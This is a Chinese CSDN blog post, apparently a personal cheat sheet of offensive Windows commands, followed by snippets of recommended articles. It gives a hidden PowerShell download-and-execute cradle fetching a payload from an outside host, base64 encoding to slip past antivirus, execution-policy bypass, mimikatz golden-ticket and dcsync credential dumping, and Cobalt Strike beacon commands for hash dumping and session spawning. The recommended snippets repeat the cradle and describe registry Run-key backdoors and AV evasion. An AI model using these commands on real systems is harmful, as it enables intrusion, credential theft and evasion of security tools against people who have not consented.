note 1

最新推荐文章于 2023-01-12 11:30:52 发布
最新推荐文章于 2023-01-12 11:30:52 发布
阅读量311 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33415811/article/details/112686575
版权

1.屏蔽控制台应用程序的窗口:
pragma comment(linker,"/subsystem:“windows” /entry:“mainCRTStartup”")
2.查询用户信息:
wmic useraccount list full

3.修改powershell安全策略:
set-executionpolicy -executionpolicy RemoteSigned
#策略:bypass 不警告;unrestricted警告

4.powershell 远程下载运行:
powershell.exe -nop -w hidden -c “IEX((new-object
net.webclient).downloadstring('http://192.168.1.8:80/fafaft))”
#IEX=invoke-Expression

5.bypass绕过策略
powershell.exe -ExecutionPolicy bypass

6.Uni+base64转码绕过
$fileContent = “powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.1.8:80/fafaft’))””
b y t e s = [ S y s t e m . T e x t . E n c o d i n g ] : : U n i c o d e . G e t B y t e s ( bytes = [System.Text.Encoding]::Unicode.GetBytes( bytes=[System.Text.Encoding]::Unicode.GetBytes(fileContent)
e n c o d e d C o m m a n d = [ C o n v e r t ] : : T o B a s e 64 S t r i n g ( encodedCommand = [Convert]::ToBase64String( encodedCommand=[Convert]::ToBase64String(bytes)
echo $encodedCommand
运行:
powershell -enc $encodedCommand

7.cs web-delivery 火绒绕过
$123 =powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(‘http://192.168.1.8:80/fafaft’)

8.mimikatz黄金票据提权
requirements:
a.krbtgt(域管理员账户)的hash
b.(域内用户的)本地admin
c.域的sid
steps:
a. 信息搜集
privilege::Debug #测试
kerberos::purge #清空票据
kerberos::list #列出票据
whoami /all #获得域sid
b.制作票据
kerberos::golden /user:Administrator /domin:你的域
/sid:管理员的sid /krbtgt:krbtgt帐户的hash /ticket:xxx.kirbi
c.导出密码
kerberos::ptt xxx.kirbi #利用票据(时限约20min)
kerberos::list
lsadump::dcsync /domain:你的域 /user:想要被导出hash的用户
TIP :dcsync要隔几分钟后食用或重启mimikatz
人造票据仅存在与admin权限的命令行内
否则error 5权限不足

9.cs beacon access
a.make token:制作用于访问windows远程资源的令牌
eg.windows共享
b.One-liner Run: oneliner x86(x64) listener
在受控机开启一个一次性的web服务并托管着木马
随即可用生成脚本在被控段创建新会话
run xxx
c.Mimikatz:logonpasswords
运行mimikatz的logonpasswords
d.spawn as 使用其他用户权限生成会话
requirements: user; pwd; domain-name ;listener
Commend:spawnas 域名\用户名 密码 listener
e.dump hashes: hashdump
f.elevate提权
g.golden ticket 生成伪造票据

10.cs beacon explore
a.Browser Pivot :当被控浏览ie时以其为代理免密登录ta在看的网站

Ashe_Lone
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
cs powershell无文件落地利用
课嗨教育的专栏
04-18 1695
目录 一、写入程序 二、cs powershell添加重启上线 三、应用程序添加重启上线 一、写入程序 cs powershell: powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://39.108.128.1:801/a'))" 以易语言为例: 运行 (“powershell.exe -nop -w hidden -c ” + #引号 + “IEX ((new-
Powershell免杀系列(二)
st3pby的博客
02-20 3221
技术交流 关注微信公众号 Z20安全团队 , 回复 加群 ,拉你入群 一起讨论技术。 直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看。 正文 powershell的免杀⽅法有很多,对代码进⾏编码是最常⻅的⼀种,这⾥介绍⼀个专⻔⽤来对powershell进⾏编码免杀的框架Invoke-Obfuscation,这也是著名的APT32组织海莲花常⽤的⼀个⼯具。 该工具可以对powershell代码进行 ASCII/hex/octal/binary/SecureS...
PowerShell命令免杀思路
qq_44657899的博客
11-08 1497
文章目录前言大小写管道符修改函数名命令拆分反引号处理低版本powershell使用Out-EncryptedScript加密免杀base64免杀组合拳 前言 UNIX 系统一直有着功能强大的壳程序(shell),Windows PowerShell 的诞生就是要提供功能相当于 UNIX 系统的命令行壳程序(例如:sh、bash 或 csh),同时也内置脚本语言以及辅助脚本程序的工具,使命令行用户和脚本编写者可以利用 .NET Framework 的强大功能。 powershell 具有在硬盘中易绕过,内存中
免杀学习(三)powershell
m0_62207170的博客
01-12 615
powershell免杀
powershell免杀思路分析(过某60和某绒)
技术超强的网络安全平台
05-07 2243
文章首发于:https://forum.butian.net/share/936 写在前面 powershell做为微软windows系统自带的软件包,具有十分强大的功能,Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的功能,在IT/系统管理员间得到普及。总的特点来说就是:方便、有效和隐蔽。举例来说,利用这些合法工具可以让威胁活动混在正常的网络流量或IT/系统管理工作内,也让这些恶意威胁能够留下较少的痕迹,使得侦测更加困难
红米Note 1TD官方恢复工具包.rar
10-31
红米Note 1TD是一款由小米公司推出的中端智能手机,主要面向预算友好型用户。官方恢复工具包是为了帮助用户在设备出现系统问题或者需要升级、降级系统时,能够便捷地进行刷机操作。这个RAR压缩包包含了进行刷机过程...
小米note1 note2 note3全系列原厂维修图纸原理图 电路图合集.zip
08-27
小米note1 note2 note3全系列原厂维修图纸原理图 电路图合集 小米Note3 一、二级维修指导.pdf 小米Note3 三级维修指导.pdf 小米Note3 位置图 点位图 位号图.pdf 小米Note3 原理图 电路图.pdf 小米Note3 注释图 主板...
note1_notes
03-17
【标题】"note1_notes"通常指的是一个笔记集合或者学习资料的整理,可能是某个人或团队在学习或工作中创建的。这种命名方式暗示了这是一个关于技术、编程或知识管理的项目,其中包含了多个子文件或文件夹,用于组织...
光学期中note1
08-03
戴老师:第四章重点是作业题,不考推导。啊,包括这个得考是吧,Confocal,还有一个什么来着,无限远,这两个必考。要解释到 TA 能看懂。光阑系统会出问答题。
大数据分析系统note1
08-03
1. 第一阶段(数据中心)----第二阶段(数据并行,百万级,传统 ML)----第三阶 2. 挑战: 3. 计算范式演变(回到了体系结构课程嘤嘤嘤) 1. 机
PowerShell 另类提权,win10测试通过,已绕过UAC!
逆向思维
05-31 1万+
在乌云上看了一篇关于”非常规提权”的做法,试了一下,效果不错.装载过来,顺便加上自己的代码段. 简洁点写,省去大部分,需要阅读原文的请去:http://drops.wooyun.org/tips/11989 0x00 简介通常,在Windows下面我们可以通过内核漏洞来提升权限,但是,我们常常会碰到所处服务器通过内核漏洞提权是行不通的,这个时候,我们就需要通过脆弱的Windows服务提权,
Powershell的学习笔记
来到了学渣的博客
10-16 4719
Powershell的优点 1、PowerShell可以用来管理活动目录 2、Windows7以上的操作系统默认安装 3、很多杀毒软件检测不到PowerShell的活动 4、可以从另外一个系统中下载PowerShell脚本并执行 5、cmd通常会被杀毒软件阻止运行,而PowerShell不会 6、PowerShell无须写到磁盘中,它可以直接在内存中运行。 Powershell的执行策略 Powershell有个安全策略,默认情况下,这个执行策略会被设置受限。 Get-ExecutionPolicy命令可
我的powershell免杀之路
mingyqf的博客
05-17 1928
我的powershell免杀之路 ​ 原创 tubai
powershell使用总结
热门推荐
Shanfenglan's blog
08-21 28万+
模块导入 Import-Module Recon Import-Module -name .\powerview.ps1 查看模块对应命令 Get-Command -Module name 其他 powershell.exe -ExecutionPolicy bypass -noprofile IEX(’’) 上述命令意思为 1、将执行策略设置为绕过,这样可以执行powershell脚本文件。 2、不加载配置文件 3、隐藏窗口 4、Iex命令为invove-expression的别名:接收一个字符串作
【基础篇】————22、隐匿攻击之Domain Fronting
Fly_鹏程万里
05-27 1569
0x01 简介 最近看到了一些关于Domain Fronting的技术,感觉很有意思,其特点在于,你真正访问的域名并不是你看到的域名,即可以隐藏攻击者的真实地址,并且此技术能够让我们在一些受限制的网络中依然连接到我们的C2服务器,其关键思想是在不同的通信层使用不同的域名,在HTTP(S)请求中,目标域名通常显示在三个关键位置:DNS查询,TLS(SNI)拓展及HTTP主机头中,通常,这三个地方都...
使用PyQt5从零进行大数据app构建(十三)pyinstaller打包讲解 -F,-D,-w,-c,以及--hidden-import的用法
infent的博客
12-12 5万+
教程合集地址:https://blog.csdn.net/infent/column/info/30927 代码下载地址:https://download.csdn.net/download/infent/10846010 最终应用来到了打包阶段,这里坑点居多,因此拿出一节来记录一下我这两天的历程。我只能说没有解决不了的问题只有定义不清晰的问题,只要方向对了,问题会随着了解的加深而迎刃而解。 ...
Windows下常见的权限维持方法
Sulli的博客
12-02 1459
0x01 注册表自启动 可以通过修改注册表自启动的键值,添加一个木马程序路径,实现开机自启动 常见的注册表启动键: # Run键 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run # Wi...
Window下常见的权限维持方式
12-02 4万+
在获取服务器权限后,通常会用一些后门技术来维持服务器权限,服务器一旦被植入后门,攻击者便如入无人之境。本文将对常见的window服务端自启动后门技术进行解析,知己知彼方能杜绝后门。 0x01 注册表自启动 通过修改注册表自启动键值,添加一个木马程序路径,实现开机自启动。 常用的注册表启动键: # Run键 HKEY_CURRENT_USER\Software\Microsoft\Win...
powershell免杀思路分析
mingyqf的博客
12-14 2958
powershell免杀思路分析 写在前面 powershell做为微软windows系统自带的软件包,具有十分强大的功能,Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的功能,在IT/系统管理员间得到普及。总的特点来说就是:方便、有效和隐蔽。举例来说,利用这些合法工具可以让威胁活动混在正常的网络流量或IT/系统管理工作内,也让这些恶意威胁能够留下较少的痕迹,使得侦测更加困难。在经过各种变形、加密、混淆、恶意文件放在远程服
protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_xiaomu_note1); //创建一个List集合,List集合的元素是map List<Map<String,Object>> listItems = new ArrayList<Map<String,Object>>(); for (int i = 0;i<names.length;i++){ Map<String,Object> listItem = new HashMap<String,Object>(); listItem.put("header",imageIds[i]); listItem.put("personName",names[i]); listItem.put("desc",descs[i]); listItems.add(listItem); }
最新发布
06-07
在该方法中,首先调用了父类的 onCreate() 方法,然后设置了该 Activity 的布局文件为 activity_xiaomu_note1.xml。接下来,创建了一个 List 集合 listItems,该集合的元素是 Map 类型。循环遍历 names 数组并将其...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值